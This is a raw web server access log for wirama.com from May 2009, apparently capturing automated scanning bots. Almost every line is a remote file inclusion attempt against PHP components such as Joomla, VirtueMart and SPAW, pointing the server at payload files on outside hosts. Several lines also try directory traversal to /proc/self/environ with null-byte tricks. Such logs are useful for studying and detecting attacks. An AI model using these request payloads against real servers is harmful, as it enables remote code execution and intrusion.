85.214.53.125 - - [02/May/2009:11:07:37 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
200.32.100.130 - - [02/May/2009:11:16:43 -0700] "GET /bbs/skin/zero_vote/error.php?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.32.100.130 - - [02/May/2009:11:16:43 -0700] "GET /logs/access_090331.log//bbs/skin/zero_vote/error.php?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.32.100.130 - - [02/May/2009:11:16:43 -0700] "GET /logs//bbs/skin/zero_vote/error.php?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.32.100.130 - - [02/May/2009:11:17:23 -0700] "GET /logs/access_090331.log//bbs/skin/zero_vote/error.php?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.32.100.130 - - [02/May/2009:11:17:26 -0700] "GET /logs//bbs/skin/zero_vote/error.php?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.32.100.130 - - [02/May/2009:11:17:26 -0700] "GET /bbs/skin/zero_vote/error.php?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.230.1.83 - - [02/May/2009:11:19:12 -0700] "GET /logs/access_090331.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.mama-nsk.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.230.1.83 - - [02/May/2009:11:19:13 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.mama-nsk.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.230.1.83 - - [02/May/2009:11:19:13 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.mama-nsk.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.118.90.253 - - [02/May/2009:11:30:33 -0700] "GET /logs/errors.php?error=http://www.one4games.de/docs/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
64.118.90.253 - - [02/May/2009:11:30:33 -0700] "GET /errors.php?error=http://www.one4games.de/docs/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
74.220.219.113 - - [02/May/2009:11:33:04 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.frutotal.com.br/boloto/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.wirama.com"
74.220.219.113 - - [02/May/2009:11:33:05 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.frutotal.com.br/boloto/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.wirama.com"
64.118.90.253 - - [02/May/2009:11:39:11 -0700] "GET /logs/access_090331.log/errors.php?error=http://www.one4games.de/docs/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.wirama.com"
64.118.90.253 - - [02/May/2009:11:39:11 -0700] "GET /errors.php?error=http://www.one4games.de/docs/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.wirama.com"
64.118.90.253 - - [02/May/2009:11:39:11 -0700] "GET /logs/errors.php?error=http://www.one4games.de/docs/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.wirama.com"
64.118.90.253 - - [02/May/2009:11:39:45 -0700] "GET /logs/access_090329.log/errors.php?error=http://www.one4games.de/docs/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.wirama.com"
74.220.219.113 - - [02/May/2009:11:39:56 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.frutotal.com.br/boloto/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
74.220.219.113 - - [02/May/2009:11:39:57 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.frutotal.com.br/boloto/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
209.90.91.245 - - [02/May/2009:11:40:13 -0700] "GET /logs/access_090331.log/errors.php?error=http://www.one4games.de/docs/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.wirama.com"
209.90.91.245 - - [02/May/2009:11:40:13 -0700] "GET /errors.php?error=http://www.one4games.de/docs/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.wirama.com"
209.90.91.245 - - [02/May/2009:11:40:13 -0700] "GET /logs/errors.php?error=http://www.one4games.de/docs/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.wirama.com"
74.220.219.113 - - [02/May/2009:11:40:16 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.frutotal.com.br/boloto/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
74.220.219.113 - - [02/May/2009:11:40:16 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.frutotal.com.br/boloto/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "wirama.com"
209.90.91.245 - - [02/May/2009:11:40:47 -0700] "GET /logs/access_090329.log/errors.php?error=http://www.one4games.de/docs/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.wirama.com"
66.219.97.207 - - [02/May/2009:11:41:57 -0700] "GET /logs/access_090331.log/errors.php?error=http://www.one4games.de/docs/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
66.219.97.207 - - [02/May/2009:11:41:58 -0700] "GET /errors.php?error=http://www.one4games.de/docs/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
66.219.97.207 - - [02/May/2009:11:41:58 -0700] "GET /logs/errors.php?error=http://www.one4games.de/docs/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
66.219.97.207 - - [02/May/2009:11:42:30 -0700] "GET /logs/access_090329.log/errors.php?error=http://www.one4games.de/docs/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
75.48.95.237 - - [02/May/2009:11:53:33 -0700] "GET /logs/access_090401.log/errors.php?error=http://h1.ripway.com/ari212/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "wirama.com"
75.48.95.237 - - [02/May/2009:11:53:33 -0700] "GET /errors.php?error=http://h1.ripway.com/ari212/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "wirama.com"
75.48.95.237 - - [02/May/2009:11:53:33 -0700] "GET /logs/errors.php?error=http://h1.ripway.com/ari212/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "wirama.com"
75.48.95.237 - - [02/May/2009:11:53:59 -0700] "GET /logs/errors.php?error=http://h1.ripway.com/windi212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
75.48.95.237 - - [02/May/2009:11:53:59 -0700] "GET /errors.php?error=http://h1.ripway.com/windi212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
200.93.147.154 - - [02/May/2009:11:56:42 -0700] "GET /logs/access_090401.log/errors.php?error=http://h1.ripway.com/windi212/andri.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "wirama.com"
200.93.147.154 - - [02/May/2009:11:56:42 -0700] "GET /errors.php?error=http://h1.ripway.com/windi212/andri.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "wirama.com"
200.93.147.154 - - [02/May/2009:11:56:42 -0700] "GET /logs/errors.php?error=http://h1.ripway.com/windi212/andri.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "wirama.com"
200.93.147.154 - - [02/May/2009:12:00:26 -0700] "GET /logs/errors.php?error=http://h1.ripway.com/ari212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
200.93.147.154 - - [02/May/2009:12:00:26 -0700] "GET /errors.php?error=http://h1.ripway.com/ari212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
200.93.147.154 - - [02/May/2009:12:00:31 -0700] "GET /logs/errors.php?error=http://h1.ripway.com/yuni212/cinta.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
200.93.147.154 - - [02/May/2009:12:00:31 -0700] "GET /errors.php?error=http://h1.ripway.com/yuni212/cinta.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
200.93.147.154 - - [02/May/2009:12:00:43 -0700] "GET /logs/access_090401.log/errors.php?error=http://h1.ripway.com/yuni212/andri.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "wirama.com"
200.93.147.154 - - [02/May/2009:12:00:43 -0700] "GET /errors.php?error=http://h1.ripway.com/yuni212/andri.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "wirama.com"
200.93.147.154 - - [02/May/2009:12:00:43 -0700] "GET /logs/errors.php?error=http://h1.ripway.com/yuni212/andri.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "wirama.com"
77.222.131.35 - - [02/May/2009:12:15:18 -0700] "GET /logs/access_090331.log//ask_password.php?dir=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.222.131.35 - - [02/May/2009:12:15:18 -0700] "GET /ask_password.php?dir=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.222.131.35 - - [02/May/2009:12:15:18 -0700] "GET /logs//ask_password.php?dir=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.173.130.41 - - [02/May/2009:12:19:01 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.173.130.41 - - [02/May/2009:12:19:01 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.173.130.41 - - [02/May/2009:12:19:01 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.93.147.154 - - [02/May/2009:12:25:57 -0700] "GET /logs//?mosConfig_absolute_path=http://iessapostol.juntaextremadura.net/blogs/conf/help.txt? HTTP/1.1" 200 1950 "-" "Mozilla/5.0" "wirama.com"
200.93.147.154 - - [02/May/2009:12:25:57 -0700] "GET /?mosConfig_absolute_path=http://iessapostol.juntaextremadura.net/blogs/conf/help.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
207.57.79.26 - - [02/May/2009:12:27:11 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [02/May/2009:12:27:11 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [02/May/2009:12:27:12 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [02/May/2009:12:27:14 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [02/May/2009:12:27:14 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [02/May/2009:12:27:14 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
121.173.130.41 - - [02/May/2009:12:29:06 -0700] "GET /body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.173.130.41 - - [02/May/2009:12:29:06 -0700] "GET /logs/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.173.130.41 - - [02/May/2009:12:29:06 -0700] "GET /logs/access.log/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.173.130.41 - - [02/May/2009:12:35:38 -0700] "GET /logs/access.log%20%20/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.173.130.41 - - [02/May/2009:12:35:39 -0700] "GET /body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.173.130.41 - - [02/May/2009:12:35:39 -0700] "GET /logs/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.173.130.41 - - [02/May/2009:12:35:43 -0700] "GET /logs/access_090329.log%20%20/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.173.130.41 - - [02/May/2009:12:39:10 -0700] "GET /logs/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.173.130.41 - - [02/May/2009:12:39:10 -0700] "GET /body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.173.130.41 - - [02/May/2009:12:39:10 -0700] "GET /logs/access.log/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.173.130.41 - - [02/May/2009:12:39:12 -0700] "GET /logs/access_090329.log/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.173.130.41 - - [02/May/2009:12:40:34 -0700] "GET /logs/access.log/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.173.130.41 - - [02/May/2009:12:40:34 -0700] "GET /logs/access_090329.log/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.32.100.130 - - [02/May/2009:12:41:28 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sysweb.it/amik/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.32.100.130 - - [02/May/2009:12:41:28 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sysweb.it/amik/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.32.100.130 - - [02/May/2009:12:41:28 -0700] "GET /logs/access_090401.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sysweb.it/amik/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.173.130.41 - - [02/May/2009:12:42:21 -0700] "GET /logs/access.log%20%20/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.173.130.41 - - [02/May/2009:12:42:22 -0700] "GET /logs/access_090329.log%20%20/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
147.83.83.89 - - [02/May/2009:12:42:23 -0700] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "wirama.com"
147.83.83.89 - - [02/May/2009:12:42:23 -0700] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "wirama.com"
147.83.83.89 - - [02/May/2009:12:42:24 -0700] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "wirama.com"
147.83.83.89 - - [02/May/2009:12:42:24 -0700] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "wirama.com"
147.83.83.89 - - [02/May/2009:12:42:24 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
147.83.83.89 - - [02/May/2009:12:42:24 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
147.83.83.89 - - [02/May/2009:12:42:24 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
147.83.83.89 - - [02/May/2009:12:42:24 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
200.32.100.130 - - [02/May/2009:12:43:09 -0700] "GET /logs/access_090301.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sysweb.it/amik/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.173.130.41 - - [02/May/2009:12:48:00 -0700] "GET /body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.173.130.41 - - [02/May/2009:12:48:01 -0700] "GET /logs/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.173.130.41 - - [02/May/2009:12:48:01 -0700] "GET /logs/access_090331.log/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.106.189.93 - - [02/May/2009:12:53:40 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.106.189.93 - - [02/May/2009:12:53:40 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.106.189.93 - - [02/May/2009:12:53:40 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.185.20.88 - - [02/May/2009:12:53:48 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.185.20.88 - - [02/May/2009:12:53:48 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.185.20.88 - - [02/May/2009:12:53:48 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.106.189.93 - - [02/May/2009:12:54:54 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.106.189.93 - - [02/May/2009:12:54:54 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.106.189.93 - - [02/May/2009:12:54:54 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
207.57.79.26 - - [02/May/2009:12:59:13 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [02/May/2009:12:59:13 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [02/May/2009:12:59:13 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
87.106.189.93 - - [02/May/2009:12:59:31 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.106.189.93 - - [02/May/2009:12:59:31 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.106.189.93 - - [02/May/2009:12:59:31 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.75.4.169 - - [02/May/2009:13:03:14 -0700] "GET /logs/administrator/errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
202.75.4.169 - - [02/May/2009:13:03:15 -0700] "GET /administrator/errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
121.173.130.41 - - [02/May/2009:13:06:42 -0700] "GET /body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.173.130.41 - - [02/May/2009:13:06:42 -0700] "GET /logs/access_090329.log/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.173.130.41 - - [02/May/2009:13:06:42 -0700] "GET /logs/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
68.171.52.5 - - [02/May/2009:13:06:47 -0700] "GET /logs/access_090331.log//error.php?%20dir=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
68.171.52.5 - - [02/May/2009:13:06:47 -0700] "GET /error.php?%20dir=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
68.171.52.5 - - [02/May/2009:13:06:47 -0700] "GET /logs//error.php?%20dir=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
207.57.79.26 - - [02/May/2009:13:07:14 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [02/May/2009:13:07:14 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
207.57.79.26 - - [02/May/2009:13:07:14 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.wirama.com"
